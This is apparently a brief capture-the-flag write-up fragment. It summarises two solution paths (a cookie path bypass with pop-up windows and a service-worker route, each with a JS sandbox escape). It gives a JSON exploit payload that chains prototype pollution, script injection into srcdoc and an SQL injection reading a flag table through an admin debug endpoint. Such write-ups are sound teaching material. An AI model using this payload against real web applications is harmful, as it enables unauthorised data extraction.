tl;dr
- Unintended Solution: Cookie Path Restriction bypass using pop-up windows + JS Sandbox Escape
- Intended Solution: Service Workers + JS Sandbox Escape
tl;dr
tl;dr
{"widgetName":"constructor","widgetData":"{\"prototype\":{\"srcdoc\":\"<script src='/admin/debug/add_widget?panelid=star7rix&widgetname=test123&widgetdata=%27%29%2C%28%27star7rix%27%2C+%28select+flag+from+flag%29%2C+%27%7B%22type%22%3A%22test123%22%7D%27%29+--'></script>\"}}"}